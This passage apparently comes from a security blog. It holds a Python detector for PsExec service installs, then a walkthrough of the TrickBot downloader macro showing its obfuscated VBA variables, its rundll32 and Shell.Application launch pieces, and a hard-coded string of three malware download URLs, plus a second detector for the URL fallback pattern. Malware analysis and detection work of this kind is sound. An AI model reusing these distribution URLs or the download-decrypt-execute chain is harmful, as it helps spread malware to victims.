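    hits = []
    for svc in sorted(filter(service_filter, events), key=_ts):
        candidates = [l for l in logons
                      if l["Computer"] == svc["Computer"]
                      and timedelta(0) <= _ts(svc) - _ts(l) <= window]
        if not candidates:
            continue
        logon = max(candidates, key=_ts)  # the logon closest before the install
        hits.append({
            "host": svc["Computer"],
            "service": svc["ServiceName"],
            "image": svc["ImagePath"],
            "user": logon["TargetUserName"],
            "source_host": logon["WorkstationName"],
            "source_ip": logon["IpAddress"],
            "logon_time": logon["TimeCreated"],
            "service_time": svc["TimeCreated"],
        })
    return hits


if __name__ == "__main__":
    for hit in find_psexec_sessions(SAMPLE_EVENTS):
        print(f"{hit['host']}: service {hit['service']} ({hit['image']}) installed at "
              f"{hit['service_time']}; {hit['user']} logged on over the network from "
              f"{hit['source_host']} [{hit['source_ip']}] at {hit['logon_time']}")
```

Running it against the sample flags only the 10:00 session from MACHINE-A; the interactive logon and the ordinary service install are rejected. Passing `service_filter=any_new_service` widens the first tier to every new service so a renamed PsExec service is still caught by its timing relative to a remote logon, at the cost of reviewing legitimate installs that happen to follow one.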
<br />
When investigating systems post-incident, you can acquire the event log (.evtx) files from this location (Windows Vista and later, including Windows 8):<br />
<br />
C:\Windows\System32\winevt\Logs<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjKtYEclbSMKfTyBGfoROO_MHPCULt0FkD6pOCl7HoVSLcOL7c-wgU_9usgAVh1sv3rmx9wW1mt8aeaI_yEOadXKPg4Q702TuGhQ-ekWG8fQgkZ67zbj6_Wg_SkRY51s2oSL79aH78E8RkR/s1600/9.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="646" data-original-width="884" height="291" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjKtYEclbSMKfTyBGfoROO_MHPCULt0FkD6pOCl7HoVSLcOL7c-wgU_9usgAVh1sv3rmx9wW1mt8aeaI_yEOadXKPg4Q702TuGhQ-ekWG8fQgkZ67zbj6_Wg_SkRY51s2oSL79aH78E8RkR/s400/9.png" width="400" /></a></div>
<br />
<br />
<br />
Once acquired, these .evtx files can be opened in Event Viewer on your investigation machine (Action &gt; Open Saved Log).<br />
<br />
:)<br />
<br /></div>
Unknownnoreply@blogger.com0tag:blogger.com,1999:blog-1270838152641758291.post-14908618187948534232017-07-25T02:07:00.002-07:002017-07-27T02:04:10.382-07:00TrickBot Downloader Deep Dive Analysis<div dir="ltr" style="text-align: left;" trbidi="on">
<div lang="en-AU" style="font-family: Calibri; font-size: 11.0pt; margin: 0in;">
The downloader arrives as a Microsoft Office document (Word or Excel) carrying macro code. </div>
<div lang="en-AU" style="font-family: Calibri; font-size: 11.0pt; margin: 0in;">
Once the user enables macros, the VBA code runs and the payload is downloaded and executed. </div>
<div lang="en-AU" style="font-family: Calibri; font-size: 11.0pt; margin: 0in;">
<br />
<a name='more'></a><br /></div>
<div lang="en-AU" style="font-family: Calibri; font-size: 11.0pt; margin: 0in;">
Flow:</div>
<div lang="en-AU" style="font-family: Calibri; font-size: 11.0pt; margin: 0in;">
<br /></div>
<ol style="direction: ltr; font-family: Calibri; font-size: 11.0pt; font-style: normal; font-weight: normal; margin-bottom: 0in; margin-left: .375in; margin-top: 0in; unicode-bidi: embed;" type="1">
<li lang="en-AU" style="margin-bottom: 0; margin-top: 0; vertical-align: middle;" value="1"><span style="font-family: "calibri"; font-size: 11.0pt; font-style: normal; font-weight: normal;">Downloader execution: the document is opened in Word or Excel</span></li>
<li lang="en-AU" style="margin-bottom: 0; margin-top: 0; vertical-align: middle;"><span style="font-family: "calibri"; font-size: 11.0pt;">The macro code is enabled and executed</span></li>
<li lang="en-AU" style="margin-bottom: 0; margin-top: 0; vertical-align: middle;"><span style="font-family: "calibri"; font-size: 11.0pt;">The script makes a call to download the payload from the internet</span></li>
<li lang="en-AU" style="margin-bottom: 0; margin-top: 0; vertical-align: middle;"><span style="font-family: "calibri"; font-size: 11.0pt;">The encrypted payload is downloaded</span></li>
<li lang="en-AU" style="margin-bottom: 0; margin-top: 0; vertical-align: middle;"><span style="font-family: "calibri"; font-size: 11.0pt;">The payload is decrypted using the running XOR key</span></li>
<li lang="en-AU" style="margin-bottom: 0; margin-top: 0; vertical-align: middle;"><span style="font-family: "calibri"; font-size: 11.0pt;">The decrypted payload is saved as a separate file and then executed</span></li>
</ol>
<div lang="en-AU" style="font-family: Calibri; font-size: 11.0pt; margin: 0in;">
<br /></div>
<div lang="en-AU" style="font-family: Calibri; font-size: 11.0pt; margin: 0in;">
<br /></div>
<div lang="en-AU" style="font-family: Calibri; font-size: 11.0pt; margin: 0in;">
Step by
step analysis:<br />
<br />
Declarations ><br />
<br />
Public MarkusPils() As String<br />
Public BladeRunner_4 As String<br />
<br />
Public Const BladeRunner_System = "User-Agent"<br />
Public SubProperty As Object<br />
<br />
<br />
Public BladeRunner_VEAM As Object<br />
Public BladeRunner_Fish As Integer<br />
<br />
<br />
Public AlertN() As String<br />
<br />
Public AlertNE As String<br />
<br />
Public BladeRunner_PokerFace As Variant<br />
Public BladeRunner_aifde As Object<br />
Public BladeRunner_FLAME As String<br />
Public BladeRunner_avatar As Object<br />
<br />
Public smbi As String<br />
Public BladeRunner_2 As String<br />
Public Const Quubo = 0<br />
<br />
<br />
<br />
<br />
Public Stocke As Integer<br />
Public BladeRunner_Project As String<br />
Public C2H5OHName As String<br />
Public BladeRunner_PathTo2 As String<br />
Public CofeeShop As Object </div>
<div lang="en-AU" style="font-family: Calibri; font-size: 11.0pt; margin: 0in;">
<br /></div>
<br />
<div lang="en-AU" style="font-family: Calibri; font-size: 11.0pt; margin: 0in;">
Start
><br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjGFc8TkBixqzRbdma_HNKBRO2w3StDh8G237VnTo6GEpQszFNt1K-9dnPcaHeZEACAEH_xwNFQ95xLWi_A6SE1e_jODHLyz28ccF-Snvo76T1Eagd4FYZ6QpoGxjVFcnsG4vDwzy73Vv01/s1600/1.png" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" data-original-height="237" data-original-width="701" height="135" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjGFc8TkBixqzRbdma_HNKBRO2w3StDh8G237VnTo6GEpQszFNt1K-9dnPcaHeZEACAEH_xwNFQ95xLWi_A6SE1e_jODHLyz28ccF-Snvo76T1Eagd4FYZ6QpoGxjVFcnsG4vDwzy73Vv01/s400/1.png" width="400" /></a></div>
<br /></div>
<div lang="en-AU" style="font-family: Calibri; font-size: 11.0pt; margin: 0in;">
<br /></div>
<div lang="en-AU" style="font-family: Calibri; font-size: 11.0pt; margin: 0in;">
<div class="separator" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhV4ePABQsgoQRUe-dvGVN-Wx40XZN3rd7cvi6muoBNiUG8kLwxOnFD7H-1yGsAXZhxXknUPqaMvu-3cARNqFB1o-YjY-W4G8p7YUC_L1Ao-Mfboo67qQM4uFwZIw6gB1Bq7Vrp_my_JwYQ/s1600/2.png" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" data-original-height="469" data-original-width="1203" height="155" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhV4ePABQsgoQRUe-dvGVN-Wx40XZN3rd7cvi6muoBNiUG8kLwxOnFD7H-1yGsAXZhxXknUPqaMvu-3cARNqFB1o-YjY-W4G8p7YUC_L1Ao-Mfboo67qQM4uFwZIw6gB1Bq7Vrp_my_JwYQ/s400/2.png" width="400" /></a></div>
<br />
<div lang="en-AU" style="font-family: Calibri; font-size: 11.0pt; margin: 0in;">
The macro grabs all of its variables from the document properties ></div>
<div lang="en-AU" style="font-family: Calibri; font-size: 11.0pt; margin: 0in;">
<br /></div>
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjZZjJKBv2ZWxhvZrKnc68t8HX1mmzsqad2SlZ3MfZLHMdxFUIIMPgBR-tE9dFqTKbS_CgckK-x76927pDAskcAVBKAm1LXzoGA7IebXENH79wldvcy7s07vwAu3nDZkRZHzqBjW7quFCx0/s1600/3.png" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" data-original-height="467" data-original-width="1235" height="151" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjZZjJKBv2ZWxhvZrKnc68t8HX1mmzsqad2SlZ3MfZLHMdxFUIIMPgBR-tE9dFqTKbS_CgckK-x76927pDAskcAVBKAm1LXzoGA7IebXENH79wldvcy7s07vwAu3nDZkRZHzqBjW7quFCx0/s400/3.png" width="400" /></a></div>
<div class="separator" style="clear: both; text-align: center;">
</div>
And here's the complete string:<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjmY_j_fIdDH2dqzsYSLymb05VftTCwAgoH5K0oHhU0_TgEJZCZ83kd4MkSt5xV_OQN5bSlzKwyxgY6R-yFkPUxwFtdlvxTzsHD9vxrTyGRT0LiBtiGKIl3gml9fasuWdJa4MmU1DGE3hG8/s1600/3a.png" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" data-original-height="100" data-original-width="1600" height="39" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjmY_j_fIdDH2dqzsYSLymb05VftTCwAgoH5K0oHhU0_TgEJZCZ83kd4MkSt5xV_OQN5bSlzKwyxgY6R-yFkPUxwFtdlvxTzsHD9vxrTyGRT0LiBtiGKIl3gml9fasuWdJa4MmU1DGE3hG8/s640/3a.png" width="640" /></a></div>
<div class="separator" style="clear: both; text-align: center;">
</div>
<div lang="en-AU" style="font-family: Calibri; font-size: 11.0pt; margin: 0in;">
<br />
The same string is visible in the document's properties window, under Status:</div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiCmt3PwoiG7p_5q7AB7lY-ZWNKjVBp7L1GlT6du118gDEJob9x47yq7213zYqW60YRa29M_2xBHplunaGQBQx31Q-k9MUpEOQxlugz-gltz1AAZUJDTMfaQV8xpBuWheFQMGncyYiNOzrg/s1600/4.png" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" data-original-height="473" data-original-width="687" height="275" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiCmt3PwoiG7p_5q7AB7lY-ZWNKjVBp7L1GlT6du118gDEJob9x47yq7213zYqW60YRa29M_2xBHplunaGQBQx31Q-k9MUpEOQxlugz-gltz1AAZUJDTMfaQV8xpBuWheFQMGncyYiNOzrg/s400/4.png" width="400" /></a></div>
<div class="separator" style="clear: both; text-align: center;">
</div>
<div lang="en-AU" style="font-family: Calibri; font-size: 11.0pt; margin: 0in;">
The values extracted from the properties are then used as the elements of the array 'AlertN' ></div>
<div lang="en-AU" style="font-family: Calibri; font-size: 11.0pt; margin: 0in;">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh1MUtkBBMIHpyLNs_8AByKtWnLjUcV_YC8kuR1191_y7Zs9B-OKLUGgznUKGFR8zsH5ajjutAMyxyS_2yHPHE1kW7h1hOmKMBPONylRSQY3wEPOmFi-QKU26_Ewlf_Bqhx-b5picdimRHO/s1600/5.png" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" data-original-height="735" data-original-width="907" height="323" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh1MUtkBBMIHpyLNs_8AByKtWnLjUcV_YC8kuR1191_y7Zs9B-OKLUGgznUKGFR8zsH5ajjutAMyxyS_2yHPHE1kW7h1hOmKMBPONylRSQY3wEPOmFi-QKU26_Ewlf_Bqhx-b5picdimRHO/s400/5.png" width="400" /></a></div>
<div class="separator" style="clear: both; text-align: center;">
</div>
<div lang="en-AU" style="font-family: Calibri; font-size: 11.0pt; margin: 0in;">
<span style="font-size: 11pt;">In the Locals window (shown here as name : value : type : scope), C2H5OHName already holds "Microsoft.XMLHTTP", the ProgID of the COM object used to make HTTP requests:</span></div>
<div lang="en-AU" style="font-family: Calibri; font-size: 11.0pt; margin: 0in;">
<span style="font-size: 11pt;">C2H5OHName
: "<b>Microsoft.XMLHTTP</b>" : String : Asck.PropellersHead</span></div>
<div lang="en-AU" style="font-family: Calibri; font-size: 11.0pt; margin: 0in;">
<span style="font-size: 11pt;"><br /></span></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjHeWcNg1ktNtl1p0o70J-WdU8l0lQTLlLdFdL0ePQoF_PCQQX-zunK0I1-4fCPrRy7rnuW_2HfbPwb1SyiVwPMUUAkqAAbZoG1tbHfJD-ZedrOO_VtA2DNLmN4mC9L6KhYBSDHT_6YKUSV/s1600/6.png" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" data-original-height="325" data-original-width="749" height="172" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjHeWcNg1ktNtl1p0o70J-WdU8l0lQTLlLdFdL0ePQoF_PCQQX-zunK0I1-4fCPrRy7rnuW_2HfbPwb1SyiVwPMUUAkqAAbZoG1tbHfJD-ZedrOO_VtA2DNLmN4mC9L6KhYBSDHT_6YKUSV/s400/6.png" width="400" /></a></div>
<div class="separator" style="clear: both; text-align: center;">
</div>
<div lang="en-AU" style="font-family: Calibri; font-size: 11.0pt; margin: 0in;">
Insert a breakpoint ></div>
<div lang="en-AU" style="font-family: Calibri; font-size: 11.0pt; margin: 0in;">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhAOTKTp0i8Ogr0grIfKBO-BcEfIc_hYAB1G7f1-jpwaTyUwbR-W4VSs9Gf-gUw1XafCqzWfPq-xxdCxYuI6YDhfHRmtJWpfbxtRDnq_3OoimZLaCKHEYTvepUb5reLSWimMxdyZR3Tl2d8/s1600/7.png" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" data-original-height="437" data-original-width="913" height="191" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhAOTKTp0i8Ogr0grIfKBO-BcEfIc_hYAB1G7f1-jpwaTyUwbR-W4VSs9Gf-gUw1XafCqzWfPq-xxdCxYuI6YDhfHRmtJWpfbxtRDnq_3OoimZLaCKHEYTvepUb5reLSWimMxdyZR3Tl2d8/s400/7.png" width="400" /></a></div>
<div class="separator" style="clear: both; text-align: center;">
</div>
<div lang="en-AU" style="font-family: Calibri; font-size: 11.0pt; margin: 0in;">
<span style="font-size: 11pt;">CofeeShop is the HTTP request object the download goes through:</span></div>
<div lang="en-AU" style="font-family: Calibri; font-size: 11.0pt; margin: 0in;">
<span style="font-size: 11pt;">CofeeShop
:</span><span style="font-size: 11pt;"> </span><span style="font-size: 11pt;">: Object/IServerXMLHTTPRequest2 :
Module2.C2H5OH</span></div>
<div lang="en-AU" style="font-family: Calibri; font-size: 11.0pt; margin: 0in;">
<span style="font-size: 11pt;"><br /></span></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiTK0gVYuMp7CPA2lpKt51tm4ywQNrXsyQHftXZukyVo-YhT5PRVy9g28ZQubfShlMkSCI40Zdn4P2LagGtP6KeQQiLXZobrhcFEI4gyDa6-GCTdgJOeaemDt-sK5CHtqsjoAsl6gOZFc-J/s1600/8.png" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" data-original-height="315" data-original-width="717" height="175" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiTK0gVYuMp7CPA2lpKt51tm4ywQNrXsyQHftXZukyVo-YhT5PRVy9g28ZQubfShlMkSCI40Zdn4P2LagGtP6KeQQiLXZobrhcFEI4gyDa6-GCTdgJOeaemDt-sK5CHtqsjoAsl6gOZFc-J/s400/8.png" width="400" /></a></div>
<div class="separator" style="clear: both; text-align: center;">
</div>
<div lang="en-AU" style="font-family: Calibri; font-size: 11.0pt; margin: 0in;">
smbi holds the launcher for the decrypted payload, which indicates the payload is a DLL (note the trailing space, ready for the file path to be appended):</div>
<div lang="en-AU" style="font-family: Calibri; font-size: 11.0pt; margin: 0in;">
smbi :
"<span style="background: yellow; mso-highlight: yellow;">rundll32.exe</span>
" : String : Module2.C2H5OH</div>
<div lang="en-AU" style="font-family: Calibri; font-size: 11.0pt; margin: 0in;">
AlertN(2) is the ProgID of the Shell.Application COM object:</div>
<div lang="en-AU" style="font-family: Calibri; font-size: 11.0pt; margin: 0in;">
AlertN(2)
: "<span style="background: yellow; mso-highlight: yellow;">shell.Application</span>"
: String : Asck.PropellersHead</div>
<div lang="en-AU" style="font-family: Calibri; font-size: 11.0pt; margin: 0in;">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhRNcsl7aEF_hTJw01axJcLIkgXBwYZyQ5hmkSJofgpWGwJJSsf3DLYxm3S9qXlYoM0OttrG-0W6wT7X1nwd2IV-ON2p39hpNClNRPFNucpWiDQliZKPbRABNBH28kixQnmuk7tJQETXR4i/s1600/9.png" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" data-original-height="295" data-original-width="1600" height="72" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhRNcsl7aEF_hTJw01axJcLIkgXBwYZyQ5hmkSJofgpWGwJJSsf3DLYxm3S9qXlYoM0OttrG-0W6wT7X1nwd2IV-ON2p39hpNClNRPFNucpWiDQliZKPbRABNBH28kixQnmuk7tJQETXR4i/s400/9.png" width="400" /></a></div>
<div lang="en-AU" style="font-family: Calibri; font-size: 11.0pt; margin: 0in;">
BladeRunner_avatar
:<span style="mso-spacerun: yes;"> </span>: Object/IWshShell3 :
Module2.AnimTransferMap</div>
<div lang="en-AU" style="font-family: Calibri; font-size: 11.0pt; margin: 0in;">
<br /></div>
<div lang="en-AU" style="font-family: Calibri; font-size: 11.0pt; margin: 0in;">
Shtefin has three URLs hard-coded; they are tried in succession, each one only if the previous one fails. </div>
<div lang="en-AU" style="font-family: Calibri; font-size: 11.0pt; margin: 0in;">
<span style="font-size: 11pt;"><br /></span></div>
<div lang="en-AU" style="font-family: Calibri; font-size: 11.0pt; margin: 0in;">
<span style="font-size: 11pt;">Shtefin :
"fondazioneprogenies.com/38rh76fCHASluxurious-ss.com/38rh76fCHASurban-dna.pt/38rh76f"
: Variant/String : Module2.AnimTransferMap</span><br />
<span style="font-size: 11pt;"><br /></span>
<span style="font-size: 11pt;">The URLs from Shtefin are passed into MarkusPils as array values:</span></div>
<div lang="en-AU" style="font-family: Calibri; font-size: 11.0pt; margin: 0in;">
<span style="font-size: 11pt;"><br /></span></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiq8i_7tmO4Gus02ERKzOmdAC0pXUjAgJXChyphenhyphen16DyA7okJs7908xYEy9KaJPEFT6EPgv5RdX_XuX2IRLSGqPWjMpOs7FrE8XU7UleMHDu76CZhTBNArYWz6bAPdPrUQ0YOKQgOubRlSlJJQ/s1600/10.png" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em; text-align: left;"><img border="0" data-original-height="391" data-original-width="1015" height="153" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiq8i_7tmO4Gus02ERKzOmdAC0pXUjAgJXChyphenhyphen16DyA7okJs7908xYEy9KaJPEFT6EPgv5RdX_XuX2IRLSGqPWjMpOs7FrE8XU7UleMHDu76CZhTBNArYWz6bAPdPrUQ0YOKQgOubRlSlJJQ/s400/10.png" width="400" /></a></div>
<br />
<div class="" style="clear: both; text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjkhyphenhyphenofomunwpeBrTMy2gXyzxSQK81CseabpQhFbPifaiKjltFIUj9euLt7RlQjYMoae1-7TITHZkImd2jHFQok1B4eFTvWyo7_OcafI6JqPcZaNqAkhCe7W6GpYCLsebVeLH5y_xvrsUGb/s1600/11.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="337" data-original-width="1081" height="123" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjkhyphenhyphenofomunwpeBrTMy2gXyzxSQK81CseabpQhFbPifaiKjltFIUj9euLt7RlQjYMoae1-7TITHZkImd2jHFQok1B4eFTvWyo7_OcafI6JqPcZaNqAkhCe7W6GpYCLsebVeLH5y_xvrsUGb/s400/11.png" width="400" /></a></div>
<br />
<div class="separator" style="clear: both; text-align: left;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjCx4OMtTJ4xavCA4YlknzrP0T1MkaJBuu5ZhwrqkzG3qUBOfl4udxPbLNjjku8qOY_uGEacn5OzOOWU_7IVpxUFPEIvmWjzPmL3YiZG5XHwPg7Du9U_2PBBpYe7iWqXKkioL86IbIvH7GL/s1600/12.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="139" data-original-width="791" height="70" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjCx4OMtTJ4xavCA4YlknzrP0T1MkaJBuu5ZhwrqkzG3qUBOfl4udxPbLNjjku8qOY_uGEacn5OzOOWU_7IVpxUFPEIvmWjzPmL3YiZG5XHwPg7Du9U_2PBBpYe7iWqXKkioL86IbIvH7GL/s400/12.png" width="400" /></a></div>
<div lang="en-AU" style="font-family: Calibri; font-size: 11.0pt; margin: 0in;">
<span style="font-size: 11pt;"><br /></span></div>
<div lang="en-AU" style="font-family: Calibri; font-size: 11.0pt; margin: 0in;">
<span style="font-size: 11pt;"><br /></span></div>
<div lang="en-AU" style="font-family: Calibri; font-size: 11.0pt; margin: 0in;">
Stocke :
6 : Integer : Module2.C2H5OH</div>
<div lang="en-AU" style="font-family: Calibri; font-size: 11.0pt; margin: 0in;">
BladeRunner_FLAME
: "C:\Users\RAGNAR~1\AppData\Local\Temp" : String : Module2.C2H5OH</div>
<div lang="en-AU" style="font-family: Calibri; font-size: 11.0pt; margin: 0in;">
<span style="font-size: 11pt;"><br /></span></div>
<div class="separator" style="clear: both; text-align: left;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhFVth18B7ywJUi3xtlNhr3j4i-YakW1dPx4-Flf3ZcBRNBrGGxGJnu7GlVgO4D_VaqEfnbobSmIAYMh4PDeft2DS4LsEamSp71y44swdY4K2N6jYgmYvw5dfcPT6VnoYbR-9gTuHoUVrxn/s1600/13.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="137" data-original-width="903" height="48" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhFVth18B7ywJUi3xtlNhr3j4i-YakW1dPx4-Flf3ZcBRNBrGGxGJnu7GlVgO4D_VaqEfnbobSmIAYMh4PDeft2DS4LsEamSp71y44swdY4K2N6jYgmYvw5dfcPT6VnoYbR-9gTuHoUVrxn/s320/13.png" width="320" /></a></div>
<br />
<div class="separator" style="clear: both; text-align: left;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhm_j30c3KdB2x2IwhbjbUIqfe0f3YMozpFwbUfs_UhF0DlGQAX_DZAd5uU9uzHHpc-UMEV-u5O_0iPgevaA3qhQ4MEvMhkowwX-0lWKDpEx0FyWNjYvoHbFjmRQksgH3TwGlU2dVxsC4-G/s1600/14.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="241" data-original-width="1159" height="66" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhm_j30c3KdB2x2IwhbjbUIqfe0f3YMozpFwbUfs_UhF0DlGQAX_DZAd5uU9uzHHpc-UMEV-u5O_0iPgevaA3qhQ4MEvMhkowwX-0lWKDpEx0FyWNjYvoHbFjmRQksgH3TwGlU2dVxsC4-G/s320/14.png" width="320" /></a></div>
<br />
<div class="separator" style="clear: both; text-align: left;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhymxft_I4S1XJdS7EhuZyZOv4RA4rBUhq17kl3NhiHZ1175wiAY2V5YMGupUPEidvik1rnXXulb8WtGhcCyFISo1Nd5wWcjhUKeqaPyumi2o88_ucfmj4VwtmHfzEnF4pLZh6ArvjEzTWH/s1600/15.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="153" data-original-width="1129" height="43" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhymxft_I4S1XJdS7EhuZyZOv4RA4rBUhq17kl3NhiHZ1175wiAY2V5YMGupUPEidvik1rnXXulb8WtGhcCyFISo1Nd5wWcjhUKeqaPyumi2o88_ucfmj4VwtmHfzEnF4pLZh6ArvjEzTWH/s320/15.png" width="320" /></a></div>
<div class="" style="clear: both; text-align: left;">
LBound is 0 and UBound is 2, which means the URLs will be picked in a loop, 1 to 3:</div>
<br />
<div class="separator" style="clear: both; text-align: left;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh-fkx-qocR1Tl2uzbprZXi0-SaP-cwOg7Oanc9RoBFt6fB8LfIjlLDDuYhjs0dlVCSrNUw6HO_Ptgb73SF_8n_CPd52SdpZY97X6EYq4kvNHtECWYb-4n0FFibir40XC0PDVxhNh2p1ERQ/s1600/16.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="275" data-original-width="643" height="136" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh-fkx-qocR1Tl2uzbprZXi0-SaP-cwOg7Oanc9RoBFt6fB8LfIjlLDDuYhjs0dlVCSrNUw6HO_Ptgb73SF_8n_CPd52SdpZY97X6EYq4kvNHtECWYb-4n0FFibir40XC0PDVxhNh2p1ERQ/s320/16.png" width="320" /></a></div>
<div class="" style="clear: both; text-align: left;">
If the server gives anything other than a 200 response code, it'll throw an error and move to the next URL. If not, the download was successful and it'll move on to the next routine. </div>
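The fallback behaviour just described leaves a footprint on the network side: one client requests the same path on successive hosts, moving on only after a non-200. The following is an added detection example written for this write-up (not code from the post or from the macro); it assumes a simple whitespace-separated proxy log of the form timestamp, client, status, URL, and the hostnames in the sample are constructed stand-ins.

```python
"""Flag the 'next URL on non-200' fallback pattern in a proxy log.

Added example for this write-up; it is not the macro's own code. It assumes a
simple whitespace-separated proxy log: <ISO timestamp> <client ip> <status> <url>.
The hostnames in the sample are constructed stand-ins, not the sample's domains.
"""
from collections import defaultdict
from datetime import datetime
from urllib.parse import urlparse

# Constructed sample log: one client requests the same path on three hosts in
# turn, giving up on each non-200 and stopping at the first 200. The second
# client's requests are ordinary browsing noise that must not be flagged.
SAMPLE_LOG = """\
2018-10-01T10:00:01 10.0.0.5 404 http://host-a.example/38rh76f
2018-10-01T10:00:02 10.0.0.5 503 http://host-b.example/38rh76f
2018-10-01T10:00:03 10.0.0.5 200 http://host-c.example/38rh76f
2018-10-01T10:05:00 10.0.0.7 200 http://intranet.example/index.html
2018-10-01T10:05:01 10.0.0.7 404 http://cdn.example/favicon.ico
"""


def parse_log(text):
    """Turn log lines into dicts with ts, client, status, host and path."""
    events = []
    for line in text.splitlines():
        if not line.strip():
            continue
        ts, client, status, url = line.split(None, 3)
        parsed = urlparse(url)
        events.append({
            "ts": datetime.fromisoformat(ts),
            "client": client,
            "status": int(status),
            "host": parsed.hostname,
            "path": parsed.path,
        })
    return events


def _continues_chain(prev, cur, window_seconds):
    """The fallback continues only if the previous try failed, the host
    changed and the retry followed within the window."""
    gap = (cur["ts"] - prev["ts"]).total_seconds()
    return prev["status"] != 200 and cur["host"] != prev["host"] and 0 <= gap <= window_seconds


def find_fallback_chains(events, window_seconds=60, min_hosts=2):
    """Return one record per client/path pair whose requests walk across at
    least `min_hosts` distinct hosts, each attempt made right after a failed
    one. Each record lists the (host, status) attempts in order."""
    by_key = defaultdict(list)
    for ev in events:
        by_key[(ev["client"], ev["path"])].append(ev)

    chains = []

    def flush(chain, client, path):
        # Only chains that actually crossed hosts are worth reporting.
        if len({e["host"] for e in chain}) >= min_hosts:
            chains.append({
                "client": client,
                "path": path,
                "attempts": [(e["host"], e["status"]) for e in chain],
            })

    for (client, path), evs in by_key.items():
        evs.sort(key=lambda e: e["ts"])
        chain = []
        for ev in evs:
            if chain and not _continues_chain(chain[-1], ev, window_seconds):
                flush(chain, client, path)
                chain = []
            chain.append(ev)
        flush(chain, client, path)
    return chains


if __name__ == "__main__":
    for hit in find_fallback_chains(parse_log(SAMPLE_LOG)):
        print(f"{hit['client']} walked {hit['path']} across: {hit['attempts']}")
```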
<br />
<div class="separator" style="clear: both; text-align: left;">
